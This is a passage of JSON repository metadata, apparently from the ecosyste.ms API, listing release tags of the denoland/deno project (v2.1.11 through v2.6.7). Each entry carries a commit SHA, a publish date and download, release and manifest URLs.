d":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/d